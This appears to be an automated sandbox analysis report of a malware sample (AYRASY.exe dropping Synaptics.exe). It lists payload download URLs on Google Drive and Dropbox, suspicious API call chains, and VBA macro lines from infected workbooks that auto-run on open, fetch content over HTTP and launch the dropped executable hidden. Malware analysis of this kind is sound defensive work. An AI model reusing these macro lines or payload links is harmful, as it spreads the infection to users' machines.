                                Source: Synaptics.exe, 00000003.00000003.2356235775.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000002.2436766309.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI3:t
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000003.00000002.2453391890.00000000078A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ7
                                Source: Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: ~DFF3ADC856E5C0AEBE.TMP.4.dr String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000003.00000003.2338678036.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/wnload?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.userconten
                                Source: Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005557000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2356852883.0000000005588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005578000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000555A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2338570644.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.000000000557A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2337108577.00000000055BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2357080869.0000000005574000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005592000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgineer
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrls
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrls(Z
                                Source: Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrlss
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: AYRASY.exe String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: AYRASY.exe String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL
                                Source: ~DFF3ADC856E5C0AEBE.TMP.4.dr String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A07294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                                System Summary

                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: eLc9RiO7.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: PWCCAWLGRE.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: eLc9RiO7.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: PWCCAWLGRE.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: eLc9RiO7.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: PWCCAWLGRE.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001E02AA NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DE769 NtdllDialogWndProc_W,CallWindowProcW
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DEA4E NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018AC99 NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018AFB4 GetParent,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF0A1 SendMessageW,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF37C NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF3AB NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF3DA NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF425 NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF45A ClientToScreen,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF594 GetWindowLongW,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018B7F2 NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_0018B845 NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DFE80 NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A202AA NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1E769 NtdllDialogWndProc_W,CallWindowProcW
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1EA4E NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CAC99 NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CAD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CAFB4 GetParent,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F0A1 SendMessageW,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F3AB NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F3DA NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F37C NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F425 NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F45A ClientToScreen,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F594 GetWindowLongW,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CB7F2 NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CB845 NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1FE80 NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A1FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B702F: CreateFileW,DeviceIoControl,CloseHandle
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001AB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74BD5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
Source: eLc9RiO7.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
Source: PWCCAWLGRE.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: String function: 009CF885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: String function: 009D7750 appears 42 times
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: String function: 00197750 appears 42 times
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: String function: 0018F885 appears 68 times
Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
Source: AYRASY.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: AYRASY.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX4413.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: AYRASY.exe, 00000000.00000003.2148294542.0000000000886000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileNamecent vs AYRASY.exe
Source: AYRASY.exe, 00000000.00000003.2148294542.0000000000886000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs AYRASY.exe
Source: AYRASY.exe, 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs AYRASY.exe
Source: AYRASY.exe, 00000000.00000000.2139728714.00000000004A5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameb! vs AYRASY.exe
Source: AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameb! vs AYRASY.exe
Source: AYRASY.exe | Binary or memory string: OriginalFileName vs AYRASY.exe
Source: AYRASY.exe | Binary or memory string: OriginalFilenameb! vs AYRASY.exe
Source: AYRASY.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@21/28@5/4
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BD712 GetLastError,FormatMessageW, | 2_2_001BD712
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001AB8B0 AdjustTokenPrivileges,CloseHandle, | 2_2_001AB8B0
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001ABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 2_2_001ABEC3
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009EB8B0 AdjustTokenPrivileges,CloseHandle, | 9_2_009EB8B0
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 9_2_009EBEC3
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 2_2_001BEA85
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001B6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, | 2_2_001B6F5B
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001BEFCD CoInitialize,CoCreateInstance,CoUninitialize, | 2_2_001BEFCD
Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, | 2_2_001731F2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
